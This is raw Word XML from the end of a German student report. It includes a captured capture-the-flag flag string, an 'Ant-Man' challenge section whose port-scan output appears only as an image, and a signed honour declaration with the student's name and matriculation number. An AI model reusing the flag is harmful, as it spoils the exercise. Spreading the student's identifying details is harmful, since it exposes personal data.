      </w:r>
    </w:p>
    <w:p w14:paraId="79E18864" w14:textId="140B2918" w:rsidR="00E3201A" w:rsidRDefault="00E3201A" w:rsidP="00E3201A">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
      <w:r w:rsidRPr="00E3201A">
        <w:t>kyl0_r3n_1s_a_3m0_{c062e67712b7ab3ded1fafc4d66b225cb7bfc1f11bf662a8214cd323}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B342AAE" w14:textId="77777777" w:rsidR="00E3201A" w:rsidRPr="008E799A" w:rsidRDefault="00E3201A" w:rsidP="00E3201A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31869B56" w14:textId="4F2D64F0" w:rsidR="000A11B0" w:rsidRDefault="006D5887" w:rsidP="000A11B0">
      <w:pPr>
        <w:pStyle w:val="berschrift1"/>
      </w:pPr>
      <w:bookmarkStart w:id="62" w:name="_Toc438909"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Ant</w:t>
      </w:r>
      <w:r w:rsidR="00112EC5">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>Man</w:t>
      </w:r>
      <w:bookmarkEnd w:id="62"/>
    </w:p>
    <w:p w14:paraId="1B862CD2" w14:textId="64E85324" w:rsidR="00277160" w:rsidRDefault="00277160" w:rsidP="00277160">
      <w:pPr>
        <w:pStyle w:val="berschrift2"/>
      </w:pPr>
      <w:bookmarkStart w:id="63" w:name="_Toc438910"/>
      <w:r>
        <w:t>Level</w:t>
      </w:r>
      <w:r w:rsidR="00346CE0">
        <w:t xml:space="preserve"> 1</w:t>
      </w:r>
      <w:bookmarkEnd w:id="63"/>
    </w:p>
    <w:p w14:paraId="3FCA7F3E" w14:textId="796C6F8A" w:rsidR="00346CE0" w:rsidRPr="00346CE0" w:rsidRDefault="00346CE0" w:rsidP="00346CE0">
      <w:r>
        <w:t>Hier ist der Befehl und die Ergebnisse des Portscans:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53DE5ECC" w14:textId="39C83CB2" w:rsidR="00112EC5" w:rsidRDefault="00112EC5" w:rsidP="00112EC5">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="764882BF" wp14:editId="6306CF8D">
            <wp:extent cx="5400675" cy="1565910"/>
            <wp:effectExtent l="0" t="0" r="952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675" cy="1565910"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="51CD4E02" w14:textId="6FE64008" w:rsidR="00E32AC7" w:rsidRDefault="00E32AC7" w:rsidP="00E32AC7">
      <w:pPr>
        <w:pStyle w:val="berschrift2"/>
      </w:pPr>
      <w:bookmarkStart w:id="64" w:name="_Toc438911"/>
      <w:r>
        <w:t>Level2</w:t>
      </w:r>
      <w:bookmarkEnd w:id="64"/>
    </w:p>
    <w:p w14:paraId="6F3356B5" w14:textId="0CB8782E" w:rsidR="00E32AC7" w:rsidRDefault="00E32AC7" w:rsidP="00E32AC7">
      <w:r>
        <w:t>Nicht mehr bearbeitet</w:t>
      </w:r>
      <w:r w:rsidR="001B0C06">
        <w:t>:/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F9F777" w14:textId="00B108D1" w:rsidR="00E32AC7" w:rsidRDefault="00E32AC7" w:rsidP="00E32AC7">
      <w:pPr>
        <w:pStyle w:val="berschrift2"/>
      </w:pPr>
      <w:bookmarkStart w:id="65" w:name="_Toc438912"/>
      <w:r>
        <w:t>Level3</w:t>
      </w:r>
      <w:bookmarkEnd w:id="65"/>
    </w:p>
    <w:p w14:paraId="22ABFDAA" w14:textId="455041CB" w:rsidR="00E32AC7" w:rsidRPr="00E32AC7" w:rsidRDefault="00E32AC7" w:rsidP="00E32AC7">
      <w:r>
        <w:t>Nicht mehr bearbeitet</w:t>
      </w:r>
      <w:r w:rsidR="001B0C06">
        <w:t>:/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD461E2" w14:textId="77777777" w:rsidR="00A5114A" w:rsidRDefault="002B1A76" w:rsidP="00A5114A">
      <w:pPr>
        <w:pStyle w:val="berschrift1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="66" w:name="_Toc438913"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Ehrenwörtliche Erklärung</w:t>
      </w:r>
      <w:bookmarkEnd w:id="66"/>
    </w:p>
    <w:p w14:paraId="61BBD76B" w14:textId="77777777" w:rsidR="00A5114A" w:rsidRPr="00A5114A" w:rsidRDefault="00A5114A" w:rsidP="00A5114A"/>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2011"/>
        <w:gridCol w:w="2268"/>
        <w:gridCol w:w="1842"/>
        <w:gridCol w:w="2384"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A5114A" w:rsidRPr="00A5114A" w14:paraId="77762008" w14:textId="77777777" w:rsidTr="00A5114A">
        <w:trPr>
          <w:trHeight w:val="397"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2035" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7E44148B" w14:textId="77777777" w:rsidR="00A5114A" w:rsidRPr="00A5114A" w:rsidRDefault="00440D21" w:rsidP="00340216">
            <w:r>
              <w:t>N</w:t>
            </w:r>
            <w:r w:rsidR="00A5114A">
              <w:t>a</w:t>
            </w:r>
            <w:r w:rsidR="00A5114A" w:rsidRPr="00A5114A">
              <w:t>me:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2296" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="14D50166" w14:textId="2DE833F2" w:rsidR="00A5114A" w:rsidRPr="00A5114A" w:rsidRDefault="00BB1273" w:rsidP="00340216">
            <w:r>
              <w:t>Binder</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1864" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4AA364EB" w14:textId="77777777" w:rsidR="00A5114A" w:rsidRPr="00A5114A" w:rsidRDefault="00A5114A" w:rsidP="00340216">
            <w:r w:rsidRPr="00A5114A">
              <w:t>Vorname:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2418" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7963746B" w14:textId="0E0C8288" w:rsidR="00A5114A" w:rsidRPr="00A5114A" w:rsidRDefault="00BB1273" w:rsidP="00340216">
            <w:r>
              <w:t>Jan</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A5114A" w:rsidRPr="00A5114A" w14:paraId="09335173" w14:textId="77777777" w:rsidTr="00A5114A">
        <w:trPr>
          <w:trHeight w:val="397"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2035" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="09B7DA28" w14:textId="77777777" w:rsidR="00A5114A" w:rsidRPr="00A5114A" w:rsidRDefault="00A5114A" w:rsidP="00340216">
            <w:r w:rsidRPr="00A5114A">
              <w:t>Matrikel-Nr.:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2296" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6D38DEC2" w14:textId="63C7CF3D" w:rsidR="00A5114A" w:rsidRPr="00A5114A" w:rsidRDefault="00BB1273" w:rsidP="00340216">
            <w:r>
              <w:t>749707</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1864" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="39C6BB74" w14:textId="77777777" w:rsidR="00A5114A" w:rsidRPr="00A5114A" w:rsidRDefault="00A5114A" w:rsidP="00340216">
            <w:r w:rsidRPr="00A5114A">
              <w:t>Studiengang:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2418" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1812181A" w14:textId="19AE920A" w:rsidR="00A5114A" w:rsidRPr="00A5114A" w:rsidRDefault="00BB1273" w:rsidP="00340216">
            <w:r>
              <w:t>SWB</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="10C85E81" w14:textId="77777777" w:rsidR="00A5114A" w:rsidRPr="00A5114A" w:rsidRDefault="00A5114A" w:rsidP="00A5114A">
      <w:pPr>
        <w:pStyle w:val="Textkrper"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71DE3767" w14:textId="736E2433" w:rsidR="00A5114A" w:rsidRPr="00A5114A" w:rsidRDefault="005814C7" w:rsidP="00A5114A">
      <w:pPr>
        <w:pStyle w:val="Textkrper"/>
      </w:pPr>
      <w:r>
        <w:t>Hiermit versichere ich, Jan Binder, dass ich den</w:t>
      </w:r>
      <w:r w:rsidR="00721229">
        <w:t xml:space="preserve"> vorliegende</w:t>
      </w:r>
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="00721229">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Praxissemesterbericht</w:t>
      </w:r>
      <w:r w:rsidR="00721229">
        <w:t xml:space="preserve"> mit dem T</w:t>
      </w:r>
      <w:r w:rsidR="00C8688E">
        <w:t>itel</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> „Continuous Delivery und der DevOps Ansatz“</w:t>
      </w:r>
      <w:r w:rsidR="00A5114A" w:rsidRPr="00A5114A">
        <w:t xml:space="preserve">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750061A0" w14:textId="135AF905" w:rsidR="00284FA6" w:rsidRPr="00A5114A" w:rsidRDefault="00385D6F" w:rsidP="00440D21">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2835"/>
          <w:tab w:val="left" w:pos="4962"/>
          <w:tab w:val="left" w:pos="7937"/>
        </w:tabs>
        <w:spacing w:before="960"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661824" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1D0ADF81" wp14:editId="29738892">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3316041</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>393206</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="954008" cy="406823"/>
                <wp:effectExtent l="38100" t="38100" r="17780" b="50800"/>
                <wp:wrapNone/>
                <wp:docPr id="26" name="Freihand 26"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId73">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="954008" cy="406823"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shapetype w14:anchorId="630736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6" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:260.6pt;margin-top:30.45pt;width:76.05pt;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">
                <v:imagedata r:id="rId74" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="005814C7">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Asperg, 26.09.2017</w:t>
      </w:r>
      <w:r w:rsidR="00284FA6" w:rsidRPr="00A5114A">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00284FA6" w:rsidRPr="00A5114A">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00284FA6" w:rsidRPr="00A5114A">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AAE3707"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7881E3C7" w14:textId="77777777" w:rsidR="00284FA6" w:rsidRDefault="00284FA6">
      <w:pPr>
        <w:sectPr w:rsidR="00284FA6">
          <w:headerReference w:type="default" r:id="rId75"/>
          <w:headerReference w:type="first" r:id="rId76"/>
          <w:type w:val="continuous"/>
          <w:pgSz w:w="11906" w:h="16838" w:code="9"/>
          <w:pgMar w:top="1418" w:right="1416" w:bottom="1134" w:left="1985" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
          <w:titlePg/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0069DF36" w14:textId="2496863F" w:rsidR="00A2487A" w:rsidRDefault="00A2487A" w:rsidP="00A2390D"/>
    <w:sectPr w:rsidR="00A2487A" w:rsidSect="005814C7">
      <w:headerReference w:type="first" r:id="rId7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001A" w14:textId="77777777" w:rsidR="0014731B" w:rsidRDefault="0014731B">
      <w:pPr>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="0E6BE71E" w14:textId="77777777" w:rsidR="0014731B" w:rsidRDefault="001473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5AAC" w14:textId="77777777" w:rsidR="0014731B" w:rsidRDefault="0014731B">
      <w:pPr>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="0B47D2B3" w14:textId="77777777" w:rsidR="0014731B" w:rsidRDefault="0014731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552" w14:textId="3625FA49" w:rsidR="00681036" w:rsidRDefault="00681036">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8E799A">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8E799A">
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:instrText>8</w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r>
      <w:instrText xml:space="preserve"> " " \* MERGEFORMAT </w:instrText>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="008E799A">
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:instrText>8</w:instrText>
    </w:r>
    <w:r w:rsidR="008E799A">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8E799A">
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:t>Batman</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r>
      <w:tab/>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:instrText xml:space="preserve"> PAGE  \* MERGEFORMAT </w:instrText>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:t>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24D5" w14:textId="77777777" w:rsidR="00681036" w:rsidRDefault="00681036">
    <w:pPr>
      <w:pStyle w:val="Kopfzeile"/>
      <w:pBdr>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:pBdr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:drawing>
        <wp:anchor distT="0" distB="36195" distL="107950" distR="0" simplePos="0" relativeHeight="251663872" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="0" wp14:anchorId="6D1C39E0" wp14:editId="6EE53664">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="page">
            <wp:posOffset>5287645</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="page">
            <wp:posOffset>411480</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="1839595" cy="426720"/>
          <wp:effectExtent l="0" t="0" r="8255" b="0"/>
          <wp:wrapSquare wrapText="bothSides"/>
          <wp:docPr id="8"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6218" w14:textId="77777777" w:rsidR="00681036" w:rsidRDefault="006810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2AA4A52"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1A3AA98A"/>
    <w:lvl w:ilvl="0" w:tplc="A526286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297A05"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A7F6F2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4EA3C93"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="09E87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CD36FA4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8D86E518"/>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6DC85D9D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0EF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66979EC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="42C85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2"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="31"/>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35"/>
  </w:num>
  <w:num w:numId="32">
    <w:abstractNumId w:val="35"/>
  </w:num>
  <w:num w:numId="33">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="34">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="35">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="36">
    <w:abstractNumId w:val="33"/>
  </w:num>
  <w:num w:numId="37">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="3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B9D"/>
    <w:rsid w:val="000053FC"/>
    <w:rsid w:val="00005F64"/>
    <w:rsid w:val="000075C4"/>
    <w:rsid w:val="00011514"/>
    <w:rsid w:val="00011D1A"/>
    <w:rsid w:val="000127B3"/>
    <w:rsid w:val="000128CF"/>
    <w:rsid w:val="000145DA"/>
    <w:rsid w:val="000148C4"/>
    <w:rsid w:val="00023D89"/>
    <w:rsid w:val="0003045F"/>
    <w:rsid w:val="0003242D"/>
    <w:rsid w:val="000344F6"/>
    <w:rsid w:val="0005071C"/>
    <w:rsid w:val="00051598"/>
    <w:rsid w:val="00056763"/>
    <w:rsid w:val="00061EAC"/>
    <w:rsid w:val="00062363"/>
    <w:rsid w:val="00062528"/>
    <w:rsid w:val="000658C4"/>
    <w:rsid w:val="0006794D"/>
    <w:rsid w:val="00067BD7"/>
    <w:rsid w:val="0007030D"/>
    <w:rsid w:val="0007320B"/>
    <w:rsid w:val="000741D0"/>
    <w:rsid w:val="00074A52"/>
    <w:rsid w:val="00080B9A"/>
    <w:rsid w:val="00092FF7"/>
    <w:rsid w:val="000947C7"/>
    <w:rsid w:val="00097B2B"/>
    <w:rsid w:val="000A11B0"/>
    <w:rsid w:val="000B3B68"/>
    <w:rsid w:val="000B7280"/>
    <w:rsid w:val="000C1239"/>
    <w:rsid w:val="000D1FF8"/>
    <w:rsid w:val="000D4860"/>
    <w:rsid w:val="000F5415"/>
    <w:rsid w:val="000F6D71"/>
    <w:rsid w:val="00101F80"/>
    <w:rsid w:val="00102503"/>
    <w:rsid w:val="00107B1A"/>
    <w:rsid w:val="00110EA3"/>
    <w:rsid w:val="00111AC6"/>
    <w:rsid w:val="00112136"/>
    <w:rsid w:val="00112EC5"/>
    <w:rsid w:val="00122B1D"/>
    <w:rsid w:val="00125EB8"/>
    <w:rsid w:val="0013188A"/>
    <w:rsid w:val="00131C08"/>
    <w:rsid w:val="0013460A"/>
    <w:rsid w:val="00134BAB"/>
    <w:rsid w:val="00135823"/>
    <w:rsid w:val="00142146"/>
    <w:rsid w:val="0014731B"/>
    <w:rsid w:val="00153290"/>
    <w:rsid w:val="001564CE"/>
    <w:rsid w:val="00156C52"/>
    <w:rsid w:val="0016411F"/>
    <w:rsid w:val="001677B6"/>
    <w:rsid w:val="001772B9"/>
    <w:rsid w:val="00183542"/>
    <w:rsid w:val="00185778"/>
    <w:rsid w:val="00194C24"/>
    <w:rsid w:val="0019585B"/>
    <w:rsid w:val="001958CA"/>
    <w:rsid w:val="001A149C"/>
    <w:rsid w:val="001A34F6"/>
    <w:rsid w:val="001A434E"/>
    <w:rsid w:val="001A4884"/>
    <w:rsid w:val="001A4DF7"/>
    <w:rsid w:val="001B0C06"/>
    <w:rsid w:val="001C1AEB"/>
    <w:rsid w:val="001C312C"/>
    <w:rsid w:val="001C5F2A"/>
    <w:rsid w:val="001D0B35"/>
    <w:rsid w:val="001D5BEC"/>
    <w:rsid w:val="001E3793"/>
    <w:rsid w:val="001E4750"/>
    <w:rsid w:val="001E56B1"/>
    <w:rsid w:val="001E5F13"/>
    <w:rsid w:val="001E5F84"/>
    <w:rsid w:val="001F0579"/>
    <w:rsid w:val="001F1461"/>
    <w:rsid w:val="001F519E"/>
    <w:rsid w:val="001F7AD5"/>
    <w:rsid w:val="001F7F9A"/>
    <w:rsid w:val="002001BA"/>
    <w:rsid w:val="00201FFF"/>
    <w:rsid w:val="00203995"/>
    <w:rsid w:val="00205C43"/>
    <w:rsid w:val="0022019F"/>
    <w:rsid w:val="00222CAE"/>
    <w:rsid w:val="00227CFA"/>
    <w:rsid w:val="00233503"/>
    <w:rsid w:val="0023515B"/>
    <w:rsid w:val="002357B3"/>
    <w:rsid w:val="002405CE"/>
    <w:rsid w:val="00241CB6"/>
    <w:rsid w:val="002426E1"/>
    <w:rsid w:val="0024546D"/>
    <w:rsid w:val="0024547B"/>
    <w:rsid w:val="0025020B"/>
    <w:rsid w:val="00256E7D"/>
    <w:rsid w:val="00270C25"/>
    <w:rsid w:val="00277160"/>
    <w:rsid w:val="00280FE8"/>
    <w:rsid w:val="00284FA6"/>
    <w:rsid w:val="0028694F"/>
    <w:rsid w:val="0029592F"/>
    <w:rsid w:val="002A2CE2"/>
    <w:rsid w:val="002A3551"/>
    <w:rsid w:val="002A46D7"/>
    <w:rsid w:val="002A65BD"/>
    <w:rsid w:val="002B1A76"/>
    <w:rsid w:val="002B4D04"/>
    <w:rsid w:val="002C2279"/>
    <w:rsid w:val="002C33EB"/>
    <w:rsid w:val="002D0ECE"/>
    <w:rsid w:val="002D1EC4"/>
    <w:rsid w:val="002D5E35"/>
    <w:rsid w:val="002E2605"/>
    <w:rsid w:val="002E5E1B"/>
    <w:rsid w:val="0030678D"/>
    <w:rsid w:val="00311B5A"/>
    <w:rsid w:val="003169C0"/>
    <w:rsid w:val="00320E79"/>
    <w:rsid w:val="00335E91"/>
    <w:rsid w:val="00340216"/>
    <w:rsid w:val="0034076B"/>
    <w:rsid w:val="00341489"/>
    <w:rsid w:val="00344096"/>
    <w:rsid w:val="00346366"/>
    <w:rsid w:val="00346CE0"/>
    <w:rsid w:val="003476CC"/>
    <w:rsid w:val="003619EC"/>
    <w:rsid w:val="0036670D"/>
    <w:rsid w:val="003713AC"/>
    <w:rsid w:val="00376458"/>
    <w:rsid w:val="00376DCD"/>
    <w:rsid w:val="00382329"/>
    <w:rsid w:val="00385D6F"/>
    <w:rsid w:val="00396AE5"/>
    <w:rsid w:val="003A0072"/>
    <w:rsid w:val="003A5710"/>
    <w:rsid w:val="003A7D40"/>
    <w:rsid w:val="003B16C3"/>
    <w:rsid w:val="003C023A"/>
    <w:rsid w:val="003C2835"/>
    <w:rsid w:val="003D12A2"/>
    <w:rsid w:val="003E11AE"/>
    <w:rsid w:val="003E1270"/>
    <w:rsid w:val="003E4D35"/>
    <w:rsid w:val="003E543D"/>
    <w:rsid w:val="003F434E"/>
    <w:rsid w:val="003F5D00"/>
    <w:rsid w:val="004019E5"/>
    <w:rsid w:val="00401AA0"/>
    <w:rsid w:val="00402261"/>
    <w:rsid w:val="0040669B"/>
    <w:rsid w:val="004129C2"/>
    <w:rsid w:val="004153F7"/>
    <w:rsid w:val="004161BB"/>
    <w:rsid w:val="00416D3A"/>
    <w:rsid w:val="00421DCE"/>
    <w:rsid w:val="00426DF5"/>
    <w:rsid w:val="00440D21"/>
    <w:rsid w:val="004428C9"/>
    <w:rsid w:val="00442CE0"/>
    <w:rsid w:val="0044521F"/>
    <w:rsid w:val="004457EC"/>
    <w:rsid w:val="00450B4E"/>
    <w:rsid w:val="00450CD2"/>
    <w:rsid w:val="00452CCD"/>
    <w:rsid w:val="0045634D"/>
    <w:rsid w:val="004624B6"/>
    <w:rsid w:val="004663DF"/>
    <w:rsid w:val="00473501"/>
    <w:rsid w:val="00474982"/>
    <w:rsid w:val="00477B81"/>
    <w:rsid w:val="00485F4F"/>
    <w:rsid w:val="004867F1"/>
    <w:rsid w:val="00494130"/>
    <w:rsid w:val="00496F8F"/>
    <w:rsid w:val="004A20C0"/>
    <w:rsid w:val="004A6AB9"/>
    <w:rsid w:val="004B5075"/>
    <w:rsid w:val="004B5F7F"/>
    <w:rsid w:val="004B75A8"/>
    <w:rsid w:val="004C0327"/>
    <w:rsid w:val="004C1B2D"/>
    <w:rsid w:val="004C2BF6"/>
    <w:rsid w:val="004C50A0"/>
    <w:rsid w:val="004D6310"/>
    <w:rsid w:val="004D79B3"/>
    <w:rsid w:val="004E1030"/>
    <w:rsid w:val="004E20D3"/>
    <w:rsid w:val="004E524D"/>
    <w:rsid w:val="004F4A51"/>
    <w:rsid w:val="004F73CB"/>
    <w:rsid w:val="005026FA"/>
    <w:rsid w:val="005117F7"/>
    <w:rsid w:val="00522F29"/>
    <w:rsid w:val="00523FAD"/>
    <w:rsid w:val="0052716E"/>
    <w:rsid w:val="0053218D"/>
    <w:rsid w:val="0054308A"/>
    <w:rsid w:val="0055381C"/>
    <w:rsid w:val="005556BC"/>
    <w:rsid w:val="00564B03"/>
    <w:rsid w:val="0056660E"/>
    <w:rsid w:val="00571F18"/>
    <w:rsid w:val="005727D4"/>
    <w:rsid w:val="0057729A"/>
    <w:rsid w:val="005814C7"/>
    <w:rsid w:val="00582419"/>
    <w:rsid w:val="00583AA1"/>
    <w:rsid w:val="005850C0"/>
    <w:rsid w:val="005921A2"/>
    <w:rsid w:val="0059633F"/>
    <w:rsid w:val="005968F5"/>
    <w:rsid w:val="005A3994"/>
    <w:rsid w:val="005B499E"/>
    <w:rsid w:val="005B7D93"/>
    <w:rsid w:val="005C2662"/>
    <w:rsid w:val="005C7F97"/>
    <w:rsid w:val="005D230E"/>
    <w:rsid w:val="005D26BD"/>
    <w:rsid w:val="005E15D9"/>
    <w:rsid w:val="005E2A9B"/>
    <w:rsid w:val="005E7A7B"/>
    <w:rsid w:val="005F060A"/>
    <w:rsid w:val="005F3BDD"/>
    <w:rsid w:val="00603309"/>
    <w:rsid w:val="00605041"/>
    <w:rsid w:val="006102F9"/>
    <w:rsid w:val="00611E9C"/>
    <w:rsid w:val="00612007"/>
    <w:rsid w:val="0061670A"/>
    <w:rsid w:val="0061746F"/>
    <w:rsid w:val="006311A9"/>
    <w:rsid w:val="00632B46"/>
    <w:rsid w:val="00636A71"/>
    <w:rsid w:val="00647B10"/>
    <w:rsid w:val="00655965"/>
    <w:rsid w:val="0065689B"/>
    <w:rsid w:val="00665000"/>
    <w:rsid w:val="0066763B"/>
    <w:rsid w:val="00670376"/>
    <w:rsid w:val="00670401"/>
    <w:rsid w:val="00673567"/>
    <w:rsid w:val="006755A3"/>
    <w:rsid w:val="006808F4"/>
    <w:rsid w:val="00681036"/>
    <w:rsid w:val="00686316"/>
    <w:rsid w:val="00693458"/>
    <w:rsid w:val="006977F8"/>
    <w:rsid w:val="006A43B2"/>
    <w:rsid w:val="006B5CE3"/>
    <w:rsid w:val="006C4AD8"/>
    <w:rsid w:val="006C6ED6"/>
    <w:rsid w:val="006C7F97"/>
    <w:rsid w:val="006D4156"/>
    <w:rsid w:val="006D455E"/>
    <w:rsid w:val="006D45A1"/>
    <w:rsid w:val="006D5460"/>
